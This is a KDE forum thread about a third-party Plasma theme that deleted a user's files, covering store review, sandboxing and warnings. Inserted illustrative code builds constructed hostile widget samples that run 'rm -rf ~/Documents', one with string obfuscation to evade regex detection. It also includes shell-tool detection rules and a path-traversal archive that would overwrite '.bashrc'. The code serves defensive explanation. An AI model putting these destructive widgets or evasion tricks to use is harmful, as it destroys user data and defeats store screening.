WARNING: Global themes and widgets created by 3rd-party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products.

A user has had a bad experience installing a global theme on Plasma and lost personal data.

Global themes do not only change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids.

We are calling on the community to help us locate and quarantine defective software by using the “Report” buttons available on each item in the KDE Store.

Please see the image below to locate them.

Meanwhile, KDE is taking measures to properly warn users before each download and we are also putting in place ways of auditing and curating what is uploaded to the KDE store.

Nevertheless, this will take time and resources. We recommend that all users be careful when installing and running software not provided directly by KDE or their distros.

And remember to report any faulty products you find!

Edit: Locking this thread. Devs are working on it. End of.


The problem is that the process is too much abstracted away, obfuscated behind automation.

There should be a feature for users to easily inspect the code in its entirety without downloading the theme/widget/plasmoid/whatever, directly on the KDE store website.


This is pretty bad. Frankly only themes screened by KDE should even make it to the KDE store, and if there’s an update then it should be screened too before being accepted. Anything but this.

Well, that would make it more like Snap, Flatpak, or even the App Store and Google Play.
And not even Canonical seems to be able to keep dirty apps out of Snap.

The idea of the KDE store is it is community driven.
If KDE have to make themselves 100% liable for every single line of code, then might as well kiss the whole thing good bye.

Easy code review is a must; is the source link not enough?
Or is there stuff that does not provide a link to the source?

Example: [image]


There is a general misconception among Linux users that since you have limited permissions, malware can't harm your system. Well, it can still harm the files under your home directory, which don't need special permissions to access :slight_smile:


The problem, as always, is screened how and by whom? Because saying “SCREEN ALL THE THINGS!” is easy, but it is much more difficult to implement, especially in a community run mostly by volunteers. Hence the appeal to community help.

You must remember that KDE is a porous community and relies on the goodwill of its members. Would you, for example, be willing to spend, say, a couple of hours a day reviewing the code of hundreds of items?

If your answer is “yes”, allow me to direct you to where you can get started.

If the answer is “no”, there is nothing wrong with that, but then you will start to appreciate the dimension of the problem.


Yeah I guess not. Unless there’s a reliable way to automatically scan the source code for functions it shouldn’t have.

According to the Halting problem, there isn’t such a way and there can never be.

If someday we develop such an algorithm (maybe in quantum computing) then this will be the end of bugs and all types of malware :slight_smile:

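Picking up the exchange above about whether add-on sources can be scanned automatically for functions they shouldn't have, here is an added illustration of why the halting-problem reply bites in practice. This is not code from KDE or from anyone in the thread. The three QML snippets are constructed samples modelled on Plasma 5's `PlasmaCore.DataSource` with `engine: "executable"`, which hands the string given to `connectSource()` to a shell; the rule names and regexes are this example's own.

```python
from __future__ import annotations

import re

# Constructed sample widget sources (not real KDE Store items).  They are
# modelled on Plasma 5's PlasmaCore.DataSource with engine "executable",
# which runs whatever string is passed to connectSource() through a shell.
BENIGN = '''
import QtQuick 2.15
import org.kde.plasma.core 2.0 as PlasmaCore

Item {
    PlasmaCore.DataSource { id: sysmon; engine: "systemmonitor" }
}
'''

OBVIOUS = '''
import org.kde.plasma.core 2.0 as PlasmaCore

Item {
    PlasmaCore.DataSource { id: sh; engine: "executable" }
    Component.onCompleted: sh.connectSource("rm -rf ~/Documents")
}
'''

# Same behaviour as OBVIOUS, but no literal "executable" or "rm" anywhere.
EVASIVE = '''
import org.kde.plasma.core 2.0 as PlasmaCore

Item {
    property string e: "exec" + "utable"
    property string c: ["r" + "m", "-rf", "~/Documents"].join(" ")
    PlasmaCore.DataSource { id: sh; engine: e }
    Component.onCompleted: sh.connectSource(c)
}
'''

# Literal-match rules: cheap and precise, and trivially evaded.
LITERAL_RULES = {
    "executable data engine": re.compile(r'engine\s*:\s*"executable"'),
    "shell command string": re.compile(
        r'connectSource\(\s*"[^"]*\b(rm|dd|curl|wget|sh|bash)\b'),
}

# Structural rule: flags any engine chosen at runtime instead of by a string
# literal.  It catches EVASIVE, but also any honest widget that does the same.
STRUCTURAL_RULES = {
    "dynamic engine name": re.compile(r'engine\s*:\s*(?!")[A-Za-z_]'),
}


def scan(source: str, rules: dict[str, re.Pattern[str]] = LITERAL_RULES) -> list[str]:
    """Return the names of the rules that fire on a widget's source."""
    return [name for name, rx in rules.items() if rx.search(source)]


def scan_all(source: str) -> list[str]:
    """Run the literal rules and the structural rule together."""
    return scan(source, {**LITERAL_RULES, **STRUCTURAL_RULES})


if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("obvious", OBVIOUS), ("evasive", EVASIVE)):
        print(f"{label:8} literal={scan(src)} all={scan_all(src)}")
```

The literal rules catch the obvious sample and pass the benign one, but the evasive sample, which does exactly the same thing at runtime, slips through untouched. The structural rule closes that gap only by flagging every widget that picks its engine dynamically, honest or not, so someone still has to read the flagged code. Scanning like this makes triage cheaper and raises the bar for lazy malware; it does not decide the question the posts above are arguing about.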

The problem with that hypothesis is that it assumes no new languages would ever be needed. Or that an AI in that future would be able to create rather than just copy. Scary.

It’s like the argument the Nvidia CEO had about “kids don’t need to learn coding any more, AI will do that in the future”. :person_facepalming:
An AI is only as good as what it can copy, so if no new code is ever done, the future of coding would come to a halt when it comes to new languages and development. Pretty boring future if you ask me.

But this is maybe a bit too off topic.


I think KDE has the technical means to minimize the damage while installing widgets and themes from online stores.

Widget and theme install locations are already known, and Plasma already has the GUI to show, fetch and install them, so we simply need to run the installation process inside a sandboxed environment like Firejail and limit writing to those specific locations only; like this we can be sure that user files are at least kept safe from any external danger.

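On the sandboxing proposal above: running the whole installer under Firejail needs Firejail on the machine and a profile tuned to Plasma. As an added example (not KDE's code, and a narrower control than the one the poster describes), here is the check a store client can enforce on its own before it writes anything: vet every member of a downloaded theme or widget archive, refuse links and device nodes, and refuse any path that would resolve outside the chosen install directory. The install roots under `~/.local/share` are the usual Plasma locations, stated here as an assumption; the two archives are constructed for the demo.

```python
from __future__ import annotations

import io
import tarfile
import tempfile
from pathlib import Path

# Assumed user-level Plasma install roots, relative to $XDG_DATA_HOME.
ALLOWED_KINDS = ("plasma/look-and-feel", "plasma/plasmoids", "plasma/desktoptheme")


def make_archive(files: dict[str, bytes]) -> bytes:
    """Build an in-memory .tar.gz from a name->bytes mapping (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def checked_members(tar: tarfile.TarFile, dest: Path) -> list[tarfile.TarInfo]:
    """Vet every member before anything is written.

    Rejects links (a link extracted first can redirect a later write outside
    dest), device nodes, and any name that resolves outside dest, whether via
    '..' or an absolute path.  Raising here means no partial extraction happens.
    """
    dest = dest.resolve()
    members = []
    for m in tar.getmembers():
        if m.issym() or m.islnk():
            raise ValueError(f"link member refused: {m.name}")
        if m.isdev():
            raise ValueError(f"device member refused: {m.name}")
        target = (dest / m.name).resolve()
        if target != dest and dest not in target.parents:
            raise ValueError(f"path escapes install root: {m.name}")
        members.append(m)
    return members


def install_archive(archive: bytes, data_home: Path, kind: str, plugin_id: str) -> list[str]:
    """Extract a downloaded add-on into data_home/<kind>/<plugin_id> and nowhere else."""
    if kind not in ALLOWED_KINDS:
        raise ValueError(f"unknown add-on kind: {kind}")
    dest = data_home / kind / plugin_id
    dest.mkdir(parents=True, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        members = checked_members(tar, dest)
        # Python >= 3.12 ships tarfile.data_filter; use it as a second layer.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **extra)
    return sorted(str(p.relative_to(dest)) for p in dest.rglob("*") if p.is_file())


def demo() -> dict:
    """Install one benign and one hostile constructed archive into a scratch data home."""
    results: dict = {}
    with tempfile.TemporaryDirectory() as tmp:
        data_home = Path(tmp) / "share"

        benign = make_archive({
            "metadata.json": b'{"KPlugin": {"Id": "org.example.clock"}}',
            "contents/ui/main.qml": b"import QtQuick 2.15\nItem {}\n",
        })
        results["benign_files"] = install_archive(
            benign, data_home, "plasma/plasmoids", "org.example.clock")

        # Four '..' hops from share/plasma/plasmoids/<id> land in tmp itself.
        hostile = make_archive({
            "metadata.json": b"{}",
            "../../../../.bashrc": b"echo pwned\n",
        })
        try:
            install_archive(hostile, data_home, "plasma/plasmoids", "org.example.evil")
            results["hostile_refused"] = False
        except ValueError as exc:
            results["hostile_refused"] = True
            results["reason"] = str(exc)
        results["bashrc_written"] = (Path(tmp) / ".bashrc").exists()
        # The hostile archive's harmless-looking metadata.json must not be written either.
        results["hostile_partial"] = (
            data_home / "plasma/plasmoids/org.example.evil/metadata.json").exists()
    return results


if __name__ == "__main__":
    print(demo())
```

The whole member list is checked before the first byte is extracted, so a hostile archive leaves nothing behind, not even its innocent-looking files. This confines only the unpacking step; once a theme's own scripts run after installation, they still have the user's full rights, which is the part a sandbox such as Firejail would have to address.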

It has nothing to do with languages or any other tools. It’s just plain maths which applies to any kind of computational device that can be described by a Turing machine (I just have no idea if a general-purpose quantum computer can be described by a Turing machine).


It has everything to do with that. Doing something faster has nothing to do with coming up with new computer languages and new ways to create code.
A computer has never, to this day, created something new; only humans have.
What you are talking about is something that would border on actual intelligence, a life.
But again, off topic, but the philosophical thought processes about these things make me very excited. :innocent:

I do think it bears mentioning here that, AFAICT, for the user in question, the source of their interaction with the KDE Store to begin with wasn’t navigating to store.kde.org, but was through the “Get New…” buttons contained within Plasma itself.

There were several lengthy Reddit threads on the topic, but IMO one action that would quickly help mitigate even a little bit of the risk here would be to significantly beef up the warning text here (image from David Edmundson’s blog):

To something like:

“The content available here has been uploaded by users like you, includes executable program code, and has not been reviewed by anyone. Follow the instructions here to review these add-ons before installation. KDE assumes no responsibility for the functionality, stability or safety of these add-ons.”

Of course, directly linking to the source code in that panel would be better, just thinking of what the fastest path to some mitigation might be.


Someone already created an MR for this :slight_smile:


I would prefer a clearer warning mentioning that such scripts may even steal or alter your personal files and data, but I guess that would be too aggressive for the average user.


Maybe I’m not average enough, but the language that was there already scared me off wanting to mess with it.

I choose among the Breeze themes and only install widgets that have many, many reviews saying how it works that are months to years old.

I think, stick to what comes with KDE and leave the “get more…” to the adventurous with strong recovery methods.


The problem with that is not everyone can make sense of code.


Well, I hate to be the guy who says that, but if someone can’t validate for themselves any 3rd party source code, they need to treat it as closed source. That’s really unfortunate but it is what it is :frowning:


I agree. My partner, for example can’t make head nor tail of code, even when it’s as human readable as Python. Fortunately she has me.

But not everyone is in that position. So they really need to not jump in blindly, and should avoid shiny shiny stuff until they’ve checked it out with someone more knowledgeable, preferably by joining a forum such as this, but well, for most people the less they know, the more likely they are to do something silly without asking, and most certainly without joining a forum.


One possible way is to show the most downloaded (e.g. in the last week) first, instead of recently updated. So what you download has probably already been “tested” by many users.
